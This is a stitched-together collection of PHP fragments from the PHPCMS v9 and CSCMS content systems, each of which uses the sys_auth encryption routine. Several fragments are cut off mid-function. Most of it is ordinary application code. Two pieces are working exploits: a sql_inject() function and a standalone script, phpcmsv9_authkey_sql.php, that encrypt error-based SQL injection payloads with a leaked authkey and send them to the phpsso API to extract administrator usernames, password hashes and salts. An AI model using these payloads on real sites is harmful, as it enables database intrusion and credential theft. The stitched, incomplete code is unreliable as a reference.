/** * 构造函数 */ public function __construct() { $this->db = pc_base::load_model('member_model'); pc_base::load_app_func('global'); /*获取系统配置*/ $this->settings = getcache('settings', 'admin'); $this->applist = getcache('applist', 'admin'); if (isset($_GET) && is_array($_GET) && count($_GET) > 0) { foreach ($_GET as $k => $v) { if (!in_array($k, array('m', 'c', 'a'))) { $_POST[$k] = $v; } } } if (isset($_POST['appid'])) { $this->appid = intval($_POST['appid']); } else { exit('0'); } if (isset($_POST['data'])) { parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data); if (!is_array($this->data)) { exit('0'); } } else { exit('0'); } if (isset($GLOBALS['HTTP_RAW_POST_DATA'])) { $this->data['avatardata'] = $GLOBALS['HTTP_RAW_POST_DATA']; if ($this->applist[$this->appid]['authkey'] != $this->data['ps_auth_key']) { exit('0'); } } }
public static function get_cookie($var, $default = '') { $var = CS_Cookie_Prefix . $var; $value = isset($_COOKIE[$var]) ? sys_auth($_COOKIE[$var], 'D', $var . CS_Encryption_Key) : $default; $value = safe_replace($value); return $value; }
/** * 发送数据 * @param $action 操作 * @param $data 数据 */ function ps_send($url, $data = null, $key) { $s = $sep = ''; foreach ($data as $k => $v) { if (is_array($v)) { $s2 = $sep2 = ''; foreach ($v as $k2 => $v2) { if (is_array($v2)) { $s3 = $sep3 = ''; foreach ($v2 as $k3 => $v3) { $k3 = $k3; $s3 .= "{$sep3}{$k}[{$k2}][{$k3}]=" . ps_stripslashes($v3); $sep3 = '&'; } $s .= $sep2 . $s3; } else { $s2 .= "{$sep2}{$k}[{$k2}]=" . ps_stripslashes($v2); $sep2 = '&'; $s .= $sep . $s2; } } } else { $s .= "{$sep}{$k}=" . ps_stripslashes($v); } $sep = '&'; } $auth_s = 'code=' . urlencode(sys_auth($s, 'ENCODE', $key)); return ps_post($url, 500000, $auth_s); }
/** * 判断用户是否已经登陆 */ public final function check_member() { $phpcms_auth = param::get_cookie('auth'); if (ROUTE_M == 'member' && ROUTE_C == 'index' && in_array(ROUTE_A, array('login', 'register', 'mini', 'send_newmail'))) { if ($phpcms_auth && ROUTE_A != 'mini') { showmessage(L('login_success', '', 'member'), 'index.php?m=member&c=index'); } else { return true; } } else { //判断是否存在auth cookie if ($phpcms_auth) { $auth_key = $auth_key = md5(pc_base::load_config('system', 'auth_key') . $_SERVER['HTTP_USER_AGENT']); list($userid, $password) = explode("\t", sys_auth($phpcms_auth, 'DECODE', $auth_key)); //验证用户,获取用户信息 $this->memberinfo = $this->db->get_one(array('userid' => $userid)); //获取用户模型信息 $this->db->set_model($this->memberinfo['modelid']); $this->_member_modelinfo = $this->db->get_one(array('userid' => $userid)); $this->_member_modelinfo = $this->_member_modelinfo ? $this->_member_modelinfo : array(); $this->db->set_model(); if (is_array($this->memberinfo)) { $this->memberinfo = array_merge($this->memberinfo, $this->_member_modelinfo); } if ($this->memberinfo && $this->memberinfo['password'] === $password) { if (!defined('SITEID')) { define('SITEID', $this->memberinfo['siteid']); } if ($this->memberinfo['groupid'] == 1) { param::set_cookie('auth', ''); param::set_cookie('_userid', ''); param::set_cookie('_username', ''); param::set_cookie('_groupid', ''); showmessage(L('userid_banned_by_administrator', '', 'member'), 'index.php?m=member&c=index&a=login'); } elseif ($this->memberinfo['groupid'] == 7) { param::set_cookie('auth', ''); param::set_cookie('_userid', ''); param::set_cookie('_groupid', ''); //设置当前登录待验证账号COOKIE,为重发邮件所用 param::set_cookie('_regusername', $this->memberinfo['username']); param::set_cookie('_reguserid', $this->memberinfo['userid']); param::set_cookie('_reguseruid', $this->memberinfo['phpssouid']); param::set_cookie('email', $this->memberinfo['email']); showmessage(L('need_emial_authentication', '', 'member'), 'index.php?m=member&c=index&a=register&t=2'); } } else { param::set_cookie('auth', ''); param::set_cookie('_userid', ''); param::set_cookie('_username', ''); param::set_cookie('_groupid', ''); } unset($userid, $password, $phpcms_auth, $auth_key); } else { $forward = isset($_GET['forward']) ? urlencode($_GET['forward']) : urlencode(get_url()); showmessage(L('please_login', '', 'member'), 'index.php?m=member&c=index&a=login&forward=' . $forward); } } }
public function init() { $allow_visitor = htmlspecialchars($_GET['allow_visitor']); $auth = sys_auth($allow_visitor, 'DECODE'); if (strpos($auth, '|') === false) { showmessage(L('illegal_operation')); } $auth_str = explode('|', $auth); $flag = $auth_str[0]; if (!preg_match('/^([0-9]+)|([0-9]+)/', $flag)) { showmessage(L('illegal_operation')); } $readpoint = intval($auth_str[1]); $paytype = intval($auth_str[2]); $http_referer = urldecode($_GET['http_referer']); if (!$readpoint) { showmessage(L('illegal_operation')); } pc_base::load_app_class('spend', 'pay', 0); $flag_arr = explode('_', $flag); $catid = $flag_arr[0]; $siteids = getcache('category_content', 'commons'); $siteid = $siteids[$catid]; $CATEGORYS = getcache('category_content_' . $siteid, 'commons'); if (isset($CATEGORYS[$catid])) { $setting = string2array($CATEGORYS[$catid]['setting']); $repeatchargedays = intval($setting['repeatchargedays']); if ($repeatchargedays) { $fromtime = SYS_TIME - 86400 * $repeatchargedays; $r = spend::spend_time($this->userid, $fromtime, $flag); if ($r) { showmessage(L('have_pay'), $http_referer, 1000); } } } if ($paytype) { if (spend::amount($readpoint, L('msg_readpoint'), $this->userid, $this->username, '', '', $flag) == false) { $msg = spend::get_msg(); $http_referer = APP_PATH . 'index.php?m=pay&c=deposit&a=pay'; } else { $msg = L('readpoint_pay', array('readpoint' => $readpoint)); } } else { if (spend::point($readpoint, L('msg_readpoint'), $this->userid, $this->username, '', '', $flag) == false) { $msg = spend::get_msg(); $http_referer = APP_PATH . 'index.php?m=pay&c=deposit&a=pay'; } else { $msg = L('readpoint_pay_point', array('readpoint' => $readpoint)); } } showmessage($msg, $http_referer, 3000); }
function __construct() { pc_base::load_app_func('global'); $this->upload_url = pc_base::load_config('system', 'upload_url'); $this->upload_path = pc_base::load_config('system', 'upload_path'); $this->imgext = array('jpg', 'gif', 'png', 'bmp', 'jpeg'); $this->userid = $_SESSION['userid'] ? $_SESSION['userid'] : (param::get_cookie('_userid') ? param::get_cookie('_userid') : sys_auth($_POST['userid_flash'], 'DECODE')); $this->isadmin = 1; $this->groupid = param::get_cookie('_groupid') ? param::get_cookie('_groupid') : 8; //判断是否登录 if (empty($this->userid)) { //showmessage(L('please_login','','member')); } }
/** * 构造函数 */ public function __construct() { $this->db = pc_base::load_model('member_model'); pc_base::load_app_func('global'); /*获取系统配置*/ $this->settings = getcache('settings', 'admin'); $this->applist = getcache('applist', 'admin'); if (isset($_GET) && is_array($_GET) && count($_GET) > 0) { foreach ($_GET as $k => $v) { if (!in_array($k, array('m', 'c', 'a'))) { $_POST[$k] = $v; } } } if (isset($_POST['appid'])) { $this->appid = intval($_POST['appid']); } else { exit('0'); } if (isset($_POST['data'])) { parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data); if (empty($this->data) || !is_array($this->data)) { exit('0'); } if (!get_magic_quotes_gpc()) { $this->data = new_addslashes($this->data); } if (isset($this->data['username']) && $this->data['username'] != '' && is_username($this->data['username']) == false) { exit('-5'); } if (isset($this->data['email']) && $this->data['username'] != '' && is_email($this->data['email']) == false) { exit('-5'); } if (isset($this->data['password']) && $this->data['password'] != '' && (is_password($this->data['password']) == false || is_badword($this->data['password']))) { exit('-5'); } if (isset($this->data['newpassword']) && $this->data['newpassword'] != '' && (is_password($this->data['newpassword']) == false || is_badword($this->data['newpassword']))) { exit('-5'); } } else { exit('0'); } if (isset($GLOBALS['HTTP_RAW_POST_DATA'])) { $this->data['avatardata'] = $GLOBALS['HTTP_RAW_POST_DATA']; //if($this->applist[$this->appid]['authkey'] != $this->data['ps_auth_key']) { // exit('0'); //} } }
function sql_inject() { global $phpcmsv9; $limit = 10; //默认显示多少个管理员账号 $admin = array(); $key = authkey(); for ($i = 0; $i < $limit; $i++) { $code = sys_auth("action=synlogin&uid=1' and(select 1 from(select count(*),concat((select (select (\n SELECT distinct concat(0x7e,username,0x3a,password,0x3a,encrypt,0x7e)FROM v9_admin limit {$i},1)) from\n information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#", 'ENCODE', $key); $target = $phpcmsv9 . '/api.php?op=phpsso&code=' . $code; #$target = $phpcmsv9 . 'phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=' . $code; $content = get_data($target); if (preg_match('/~(.+?)~1/', $content, $match)) { $admin[] = $match[1]; } else { break; } } return $admin; }
public function download() { $a_k = trim($_GET['a_k']); $pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT']); $a_k = sys_auth($a_k, 'DECODE', $pc_auth_key); if(empty($a_k)) showmessage(L('illegal_parameters')); unset($i,$m,$f,$t,$ip); parse_str($a_k); if(isset($i)) $downid = intval($i); if(!isset($m)) showmessage(L('illegal_parameters')); if(!isset($modelid)) showmessage(L('illegal_parameters')); if(empty($f)) showmessage(L('url_invalid')); if(!$i || $m<0) showmessage(L('illegal_parameters')); if(!isset($t)) showmessage(L('illegal_parameters')); if(!isset($ip)) showmessage(L('illegal_parameters')); $starttime = intval($t); if(preg_match('/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(\.|$)/i',$f) || strpos($f, ":\\")!==FALSE || strpos($f,'..')!==FALSE) showmessage(L('url_error')); $fileurl = trim($f); if(!$downid || empty($fileurl) || !preg_match("/[0-9]{10}/", $starttime) || !preg_match("/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/", $ip) || $ip != ip()) showmessage(L('illegal_parameters')); $endtime = SYS_TIME - $starttime; if($endtime > 3600) showmessage(L('url_invalid')); if($m) $fileurl = trim($s).trim($fileurl); //远程文件 if(strpos($fileurl, ':/') && (strpos($fileurl, pc_base::load_config('system','upload_url')) === false)) { header("Location: $fileurl"); } else { if($d == 0) { header("Location: ".$fileurl); } else { $fileurl = str_replace(array(pc_base::load_config('system','upload_url'),'/'), array(pc_base::load_config('system','upload_path'),DIRECTORY_SEPARATOR), $fileurl); $filename = basename($fileurl); //处理中文文件 if(preg_match("/^([\s\S]*?)([\x81-\xfe][\x40-\xfe])([\s\S]*?)/", $fileurl)) { $filename = str_replace(array("%5C", "%2F", "%3A"), array("\\", "/", ":"), urlencode($fileurl)); $filename = urldecode(basename($filename)); } $ext = fileext($filename); $filename = date('Ymd_his').random(3).'.'.$ext; file_down($fileurl, $filename); } } }
$title = $_GET['title']; $title = addslashes(urldecode($title)); if (CHARSET != 'utf-8') { $title = iconv('utf-8', CHARSET, $title); $title = addslashes($title); } $title = htmlspecialchars($title); $url = safe_replace(addslashes(urldecode($_GET['url']))); $url = trim_script($url); } $_GET['callback'] = safe_replace($_GET['callback']); //判断是否登录 $phpcms_auth = param::get_cookie('auth'); if ($phpcms_auth) { $auth_key = md5(pc_base::load_config('system', 'auth_key') . $_SERVER['HTTP_USER_AGENT']); list($userid, $password) = explode("\t", sys_auth($phpcms_auth, 'DECODE', $auth_key)); if ($userid > 0) { } else { exit(trim_script($_GET['callback']) . '(' . json_encode(array('status' => -1)) . ')'); } } else { exit(trim_script($_GET['callback']) . '(' . json_encode(array('status' => -1)) . ')'); } $favorite_db = pc_base::load_model('favorite_model'); $data = array('title' => $title, 'url' => $url, 'adddate' => SYS_TIME, 'userid' => $userid); //根据url判断是否已经收藏过。 $is_exists = $favorite_db->get_one(array('url' => $url, 'userid' => $userid)); if (!$is_exists) { $favorite_db->insert($data); } exit(trim_script($_GET['callback']) . '(' . json_encode(array('status' => 1)) . ')');
/** * 同步退出 * @return string javascript用户同步退出js */ public function synlogout() { if($this->applist[$this->appid]['synlogin']) { $res = ''; //ucenter登陆部份 if ($this->config['ucuse']) { pc_base::load_config('uc_config'); require_once PHPCMS_PATH.'api/uc_client/client.php'; $res .= uc_user_synlogout(); } foreach($this->applist as $v) { if (!$v['synlogin']) continue; if($v['appid'] != $this->appid) { $tmp_s = strstr($v['url'].$v['apifilename'], '?') ? '&' : '?'; $res .= '<script type="text/javascript" src="'.$v['url'].$v['apifilename'].$tmp_s.'time='.SYS_TIME.'&code='.urlencode(sys_auth('action=synlogout&time='.SYS_TIME, 'ENCODE', $v['authkey'])).'" reload="1"></script>'; } } exit($res); } else { exit; } }
public function show() { $catid = intval($_GET['catid']); $id = intval($_GET['id']); if (!$catid || !$id) { showmessage(L('information_does_not_exist'), 'blank'); } $page = intval($_GET['page']); $page = max($page, 1); $siteids = getcache('category_content', 'commons'); $siteid = $siteids[$catid]; $CATEGORYS = getcache('category_content_' . $siteid, 'commons'); if (!isset($CATEGORYS[$catid]) || $CATEGORYS[$catid]['type'] != 0) { showmessage(L('information_does_not_exist'), 'blank'); } $this->category = $CAT = $CATEGORYS[$catid]; $this->category_setting = $CAT['setting'] = string2array($this->category['setting']); $siteid = $GLOBALS['siteid'] = $CAT['siteid']; $MODEL = getcache('model', 'commons'); $modelid = $CAT['modelid']; $tablename = $this->db->table_name = $this->db->db_tablepre . $MODEL[$modelid]['tablename']; $r = $this->db->get_one(array('id' => $id)); if (!$r || $r['status'] != 99) { showmessage(L('info_does_not_exists'), 'blank'); } $this->db->table_name = $tablename . '_data'; $r2 = $this->db->get_one(array('id' => $id)); $rs = $r2 ? array_merge($r, $r2) : $r; //再次重新赋值,以数据库为准 $catid = $CATEGORYS[$r['catid']]['catid']; $modelid = $CATEGORYS[$catid]['modelid']; require_once CACHE_MODEL_PATH . 'content_output.class.php'; $content_output = new content_output($modelid, $catid, $CATEGORYS); $data = $content_output->get($rs); //print_r($data); extract($data); //检查文章会员组权限 if ($groupids_view && is_array($groupids_view)) { $_groupid = param::get_cookie('_groupid'); $_groupid = intval($_groupid); if (!$_groupid) { $forward = urlencode(get_url()); showmessage(L('login_website'), APP_PATH . 'index.php?m=member&c=index&a=login&forward=' . $forward); } if (!in_array($_groupid, $groupids_view)) { showmessage(L('no_priv')); } } else { //根据栏目访问权限判断权限 $_priv_data = $this->_category_priv($catid); if ($_priv_data == '-1') { $forward = urlencode(get_url()); showmessage(L('login_website'), APP_PATH . 'index.php?m=member&c=index&a=login&forward=' . $forward); } elseif ($_priv_data == '-2') { showmessage(L('no_priv')); } } if (module_exists('comment')) { $allow_comment = isset($allow_comment) ? $allow_comment : 1; } else { $allow_comment = 0; } //阅读收费 类型 $paytype = $rs['paytype']; $readpoint = $rs['readpoint']; $allow_visitor = 1; if ($readpoint || $this->category_setting['defaultchargepoint']) { if (!$readpoint) { $readpoint = $this->category_setting['defaultchargepoint']; $paytype = $this->category_setting['paytype']; } //检查是否支付过 $allow_visitor = self::_check_payment($catid . '_' . $id, $paytype); if (!$allow_visitor) { $http_referer = urlencode(get_url()); $allow_visitor = sys_auth($catid . '_' . $id . '|' . $readpoint . '|' . $paytype) . '&http_referer=' . $http_referer; } else { $allow_visitor = 1; } } //最顶级栏目ID $arrparentid = explode(',', $CAT['arrparentid']); $top_parentid = $arrparentid[1] ? $arrparentid[1] : $catid; $brother_cats = subcat($top_parentid); //顶级栏目子栏目集合,03月10日 $template = $template ? $template : $CAT['setting']['show_template']; if (!$template) { $template = 'show'; } //SEO $seo_keywords = ''; if (!empty($keywords)) { $seo_keywords = implode(',', $keywords); } $_cateinfo = M("category")->get_one("catid=" . $catid); $sys_title = M("safe_system")->get_one("id=1"); $SEO = array('site_title' => $sys_title['attr_value'], 'keyword' => empty($seo_keywords) ? $sys_title['attr_value'] : $seo_keywords, "description" => $sys_title['attr_value'], 'title' => $title . " - " . $_cateinfo['catname'] . " - "); define('STYLE', $CAT['setting']['template_list']); if (isset($rs['paginationtype'])) { $paginationtype = $rs['paginationtype']; $maxcharperpage = $rs['maxcharperpage']; } $pages = $titles = ''; if ($rs['paginationtype'] == 1) { //自动分页 if ($maxcharperpage < 10) { $maxcharperpage = 500; } $contentpage = pc_base::load_app_class('contentpage'); $content = $contentpage->get_data($content, $maxcharperpage); } if ($rs['paginationtype'] != 0) { //手动分页 $CONTENT_POS = strpos($content, '[page]'); if ($CONTENT_POS !== false) { $this->url = pc_base::load_app_class('url', 'content'); $contents = array_filter(explode('[page]', $content)); $pagenumber = count($contents); if (strpos($content, '[/page]') !== false && $CONTENT_POS < 7) { $pagenumber--; } for ($i = 1; $i <= $pagenumber; $i++) { $pageurls[$i] = $this->url->show($id, $i, $catid, $rs['inputtime']); } $END_POS = strpos($content, '[/page]'); if ($END_POS !== false) { if ($CONTENT_POS > 7) { $content = '[page]' . $title . '[/page]' . $content; } if (preg_match_all("|\\[page\\](.*)\\[/page\\]|U", $content, $m, PREG_PATTERN_ORDER)) { foreach ($m[1] as $k => $v) { $p = $k + 1; $titles[$p]['title'] = strip_tags($v); $titles[$p]['url'] = $pageurls[$p][0]; } } } //当不存在 [/page]时,则使用下面分页 $pages = content_pages($pagenumber, $page, $pageurls); //判断[page]出现的位置是否在第一位 if ($CONTENT_POS < 7) { $content = $contents[$page]; } else { if ($page == 1 && !empty($titles)) { $content = $title . '[/page]' . $contents[$page - 1]; } else { $content = $contents[$page - 1]; } } if ($titles) { list($title, $content) = explode('[/page]', $content); $content = trim($content); if (strpos($content, '</p>') === 0) { $content = '<p>' . $content; } if (stripos($content, '<p>') === 0) { $content = $content . '</p>'; } } } } $this->db->table_name = $tablename; //上一页 $previous_page = $this->db->get_one("`catid` = '{$catid}' AND `id`<'{$id}' AND `status`=99", '*', 'id DESC'); //下一页 $next_page = $this->db->get_one("`catid`= '{$catid}' AND `id`>'{$id}' AND `status`=99"); if (empty($previous_page)) { $previous_page = array('title' => L('first_page'), 'thumb' => IMG_PATH . 'nopic_small.gif', 'url' => 'javascript:alert(\'' . L('first_page') . '\');'); } if (empty($next_page)) { $next_page = array('title' => L('last_page'), 'thumb' => IMG_PATH . 'nopic_small.gif', 'url' => 'javascript:alert(\'' . L('last_page') . '\');'); } include template('content', $template); }
public function synlogout($get, $post) { $res = ''; foreach ($this->applist as $v) { if ($v['appid'] != $this->appid) { $f = strstr($v['url'] . $v['apifilename'], '?') ? '&' : '?'; $res .= '<script type="text/javascript" src="' . $v['url'] . $v['apifilename'] . $f . 'time=' . SYS_TIME . '&code=' . urlencode(sys_auth('action=synlogout&time=' . SYS_TIME, 'ENCODE', $v['authkey'])) . '" reload="1"></script>'; } } header("Content-type: text/javascript"); return format_js($res); }
/** * 找回密码 * 新增加短信找回方式 */ public function public_forget_password() { $email_config = getcache('common', 'commons'); //SMTP MAIL 二种发送模式 if ($email_config['mail_type'] == '1') { if (empty($email_config['mail_user']) || empty($email_config['mail_password'])) { showmessage(L('email_config_empty'), HTTP_REFERER); } } $this->_session_start(); $member_setting = getcache('member_setting'); if (isset($_POST['dosubmit'])) { if ($_SESSION['code'] != strtolower($_POST['code'])) { showmessage(L('code_error'), HTTP_REFERER); } $memberinfo = $this->db->get_one(array('email' => $_POST['email'])); if (!empty($memberinfo['email'])) { $email = $memberinfo['email']; } else { showmessage(L('email_error'), HTTP_REFERER); } pc_base::load_sys_func('mail'); $code = sys_auth($memberinfo['userid'] . "\t" . microtime(true), 'ENCODE', get_auth_key('email')); $url = APP_PATH . "index.php?m=member&c=index&a=public_forget_password&code={$code}"; $message = $member_setting['forgetpassword']; $message = str_replace(array('{click}', '{url}'), array('<a href="' . $url . '">' . L('please_click') . '</a>', $url), $message); //获取站点名称 $sitelist = getcache('sitelist', 'commons'); if (isset($sitelist[$memberinfo['siteid']]['name'])) { $sitename = $sitelist[$memberinfo['siteid']]['name']; } else { $sitename = 'PHPCMS_V9_MAIL'; } sendmail($email, L('forgetpassword'), $message, '', '', $sitename); showmessage(L('operation_success'), 'index.php?m=member&c=index&a=login'); } elseif ($_GET['code']) { $hour = date('y-m-d h', SYS_TIME); $code = sys_auth($_GET['code'], 'DECODE', get_auth_key('email')); $code = explode("\t", $code); if (is_array($code) && is_numeric($code[0]) && date('y-m-d h', SYS_TIME) == date('y-m-d h', $code[1])) { $memberinfo = $this->db->get_one(array('userid' => $code[0])); if (empty($memberinfo['phpssouid'])) { showmessage(L('operation_failure'), 'index.php?m=member&c=index&a=login'); } $updateinfo = array(); $password = random(8, "23456789abcdefghkmnrstwxy"); $updateinfo['password'] = password($password, $memberinfo['encrypt']); $this->db->update($updateinfo, array('userid' => $code[0])); if (pc_base::load_config('system', 'phpsso')) { //初始化phpsso $this->_init_phpsso(); $this->client->ps_member_edit('', $email, '', $password, $memberinfo['phpssouid'], $memberinfo['encrypt']); } $email = $memberinfo['email']; //获取站点名称 $sitelist = getcache('sitelist', 'commons'); if (isset($sitelist[$memberinfo['siteid']]['name'])) { $sitename = $sitelist[$memberinfo['siteid']]['name']; } else { $sitename = 'PHPCMS_V9_MAIL'; } pc_base::load_sys_func('mail'); sendmail($email, L('forgetpassword'), "New password:" . $password, '', '', $sitename); showmessage(L('operation_success') . L('newpassword') . ':' . $password); } else { showmessage(L('operation_failure'), 'index.php?m=member&c=index&a=login'); } } else { $siteid = isset($_REQUEST['siteid']) && trim($_REQUEST['siteid']) ? intval($_REQUEST['siteid']) : 1; $siteinfo = siteinfo($siteid); include template('member', 'forget_password'); } }
<?php /** * Created by 独自等待 * Date: 2015/7/17 * Time: 21:08 * Name: phpcmsv9_authkey_sql.php * 独自等待博客:http://www.waitalone.cn/ */ set_time_limit(0); $wang_url = 'http://localhost/phpcmsv9'; //请修改这里为phpcmsv9网站地址 $auth_key = 'H9zUDnCVcNUvuk9EHIANYHfRvC2W5kAF'; //这里为phpcmsv9 authkey $str = "uid=1" . stripslashes($_GET['id']); $encode = sys_auth($str, 'ENCODE', $auth_key); $content = file_get_contents($wang_url . "/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=" . $encode); echo $content; function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) { $key_length = 4; $key = md5($key); $fixedkey = hash('md5', $key); $egiskeys = md5(substr($fixedkey, 16, 16)); $runtokey = $key_length ? $operation == 'ENCODE' ? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length) : ''; $keys = hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16)); $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length)); $i = 0; $result = ''; $string_length = strlen($string); for ($i = 0; $i < $string_length; $i++) {
function get_cookie($key) { $config = array(); $config = C('cookie'); $config['cookiepre'] = isset($config['cookiepre']) ? $config['cookiepre'] : ''; $val = isset($_COOKIE[$config['cookiepre'] . $key]) ? $_COOKIE[$config['cookiepre'] . $key] : ''; return sys_auth($val, 'DECODE'); }
/** * swfupload上传附件 */ public function swfupload() { $grouplist = getcache('grouplist', 'member'); if (isset($_POST['dosubmit'])) { if ($_POST['swf_auth_key'] != md5(pc_base::load_config('system', 'auth_key') . $_POST['SWFUPLOADSESSID']) || $_POST['isadmin'] == 0 && !$grouplist[$_POST['groupid']]['allowattachment']) { exit; } pc_base::load_sys_class('attachment', '', 0); $attachment = new attachment($_POST['module'], $_POST['catid'], $_POST['siteid']); $attachment->set_userid($_POST['userid']); $siteid = get_siteid(); $site_setting = get_site_setting($siteid); $site_allowext = $site_setting['upload_allowext']; $aids = $attachment->upload('Filedata', $site_allowext, '', '', array($_POST['thumb_width'], $_POST['thumb_height']), $_POST['watermark_enable']); if ($aids[0]) { $filename = strtolower(CHARSET) != 'utf-8' ? iconv('gbk', 'utf-8', $attachment->uploadedfiles[0]['filename']) : $attachment->uploadedfiles[0]['filename']; if ($attachment->uploadedfiles[0]['isimage']) { echo $aids[0] . ',' . $this->upload_url . $attachment->uploadedfiles[0]['filepath'] . ',' . $attachment->uploadedfiles[0]['isimage'] . ',' . $filename; } else { $fileext = $attachment->uploadedfiles[0]['fileext']; if ($fileext == 'zip' || $fileext == 'rar') { $fileext = 'rar'; } elseif ($fileext == 'doc' || $fileext == 'docx') { $fileext = 'doc'; } elseif ($fileext == 'xls' || $fileext == 'xlsx') { $fileext = 'xls'; } elseif ($fileext == 'ppt' || $fileext == 'pptx') { $fileext = 'ppt'; } elseif ($fileext == 'flv' || $fileext == 'swf' || $fileext == 'rm' || $fileext == 'rmvb') { $fileext = 'flv'; } else { $fileext = 'do'; } echo $aids[0] . ',' . $this->upload_url . $attachment->uploadedfiles[0]['filepath'] . ',' . $fileext . ',' . $filename; } exit; } else { echo '0,' . $attachment->error(); exit; } } else { if ($this->isadmin == 0 && !$grouplist[$this->groupid]['allowattachment']) { showmessage(L('att_no_permission')); } $args = $_GET['args']; $authkey = $_GET['authkey']; if (upload_key($args) != $authkey) { showmessage(L('attachment_parameter_error')); } extract(getswfinit($_GET['args'])); $siteid = $this->get_siteid(); $site_setting = get_site_setting($siteid); $file_size_limit = sizecount($site_setting['upload_maxsize'] * 1024); $att_not_used = param::get_cookie('att_json'); if (empty($att_not_used) || !isset($att_not_used)) { $tab_status = ' class="on"'; } if (!empty($att_not_used)) { $div_status = ' hidden'; } //获取临时未处理文件列表 $att = $this->att_not_used(); $userid_flash = sys_auth($this->userid, 'ENCODE'); include $this->admin_tpl('swfupload'); } }
public function get_templates($dir = NULL, $plubs = 0, $skins = NULL, $ulog = 0) { if (!defined('IS_ADMIN') && strpos(REQUEST_URI, 'index.php/install/') === FALSE && !file_exists(FCPATH . 'packs/install/plub_install.lock')) { msg_txt(L('plub_no_instal'), Web_Path . 'admin.php'); } if (!defined('PLUBPATH') && $plubs == 0) { //系统默认视图路径 $path = str_replace("\\", "/", CSCMS); if (!$dir) { $dirs = 'tpl/skins/' . Web_Skins; } else { if ($dir == 'user') { $dirs = 'tpl/' . $dir . '/' . User_Skins; //会员中心默认视图 } elseif ($dir == 'home') { if (!empty($skins)) { $dirs = 'tpl/' . $dir . '/' . $skins; //会员空间默认视图 } else { $dirs = 'tpl/' . $dir . '/' . Home_Skins; //会员空间默认视图 } } else { $dirs = 'tpl/' . $dir . '/'; //系统后台视图 } } if (defined('MOBILE') && Mobile_Is == 1) { //手机门户视图 if ($dir == 'user') { $dirs = 'tpl/mobile/' . Mobile_Skins . 'user/'; } elseif ($dir == 'home') { $dirs = 'tpl/mobile/' . Mobile_Skins . 'home/'; } elseif ($dir != 'admin') { $dirs = 'tpl/mobile/' . Mobile_Skins; } } } else { //版块视图路径 $path = str_replace("\\", "/", APPPATH); $dir_file = APPPATH . 'config/site.php'; if ($plubs == 1 && !defined('PLUBPATH')) { define('PLUBPATH', $dir); $path = FCPATH . 'plugins/' . $dir . '/'; $dir_file = FCPATH . 'plugins/' . $dir . '/config/site.php'; } $ak = getzd('plugins', 'ak', PLUBPATH, 'dir'); if (empty($ak)) { msg_txt(vsprintf(L('plub_key_err1'), array(PLUBPATH)), Web_Path); } $arrs = unarraystring(sys_auth($ak, 'D')); if ($arrs == '' || empty($arrs['md5']) || md5(PLUBPATH . $arrs['key'] . host_ym(1)) != $arrs['md5']) { msg_txt(vsprintf(L('plub_key_err2'), array(PLUBPATH)), Web_Path); } $dirs = 'tpl/skins/default/'; if (is_file($dir_file)) { $plub = (require $dir_file); if (is_array($plub)) { //后台视图 if (defined('IS_ADMIN') && $plubs < 2) { $dirs = 'tpl/admin/'; //手机视图 } elseif (!defined('IS_ADMIN') && defined('MOBILE') && $plub['Mobile_Is'] == 1) { $dirs = 'tpl/mobile/' . $plub['Mobile_Dir']; if (defined('HOMEPATH')) { $dirs .= 'home/'; } if (defined('USERPATH')) { $dirs .= 'user/'; } //前台视图 } else { if (defined('HOMEPATH')) { if ($ulog == 1) { $path = str_replace("\\", "/", CSCMS); } if (!empty($skins)) { $dirs = 'tpl/home/' . $skins; } else { $dirs = 'tpl/home/' . Home_Skins; } } elseif (defined('USERPATH')) { $dirs = 'tpl/user/' . $plub['User_Dir']; } else { $dirs = 'tpl/skins/' . $plub['Skins_Dir']; } } } } } if (substr($dirs, -1) != '/') { $dirs .= '/'; } $this->_ci_view_paths = array($path . $dirs => TRUE); }
/** * 获取通过 set_cookie 设置的 cookie 变量 * @param string $var 变量名 * @param string $default 默认值 * @return mixed 成功则返回cookie 值,否则返回 false */ public static function get_cookie($var, $default = '') { $var = pc_base::load_config('system', 'cookie_pre') . $var; $value = isset($_COOKIE[$var]) ? sys_auth($_COOKIE[$var], 'DECODE') : $default; if (in_array($var, array('_userid', 'userid', 'siteid', '_groupid', '_roleid'))) { $value = intval($value); } elseif (in_array($var, array('_username', 'username', '_nickname', 'admin_username', 'sys_lang'))) { // site_model auth $value = safe_replace($value); } return $value; }
function User_Login($cid = 0, $key = '') { if (!empty($key)) { $key = unserialize(stripslashes(sys_auth($key, 'D'))); $id = isset($key['id']) ? intval($key['id']) : 0; $logstr = isset($key['login']) ? $key['login'] : ''; } else { $id = isset($_SESSION['cscms__id']) ? intval($_SESSION['cscms__id']) : 0; $logstr = isset($_SESSION['cscms__login']) ? $_SESSION['cscms__login'] : ''; } $user_id = intval($this->cookie->get_cookie('user_id')); $user_login = $this->cookie->get_cookie('user_login'); $login = FALSE; if ($id == 0 || empty($logstr)) { if ($user_id > 0 && !empty($user_login)) { //判断非法COOKIE if (!preg_match('/^[0-9a-zA-Z]*$/', $user_login)) { $userlogin = ''; } $row = $this->db->query("SELECT id,name,code,pass,lognum,level,jinyan,cion,vip,logtime,viptime FROM " . CS_SqlPrefix . "user where id=" . $user_id . "")->row(); if ($row) { //判断账号密码是否正确 if (md5($row->name . $row->pass . $row->code) == $user_login) { //每天登陆加积分 if (User_Cion_Log > 0 && date("Y-m-d", $row->logtime) != date('Y-m-d')) { $updata['cion'] = $row->cion + User_Cion_Log; } //判断VIP if ($row->vip > 0 && $viptime < time()) { $updata['vip'] = 0; $updata['viptime'] = 0; } //判断等级 $level = 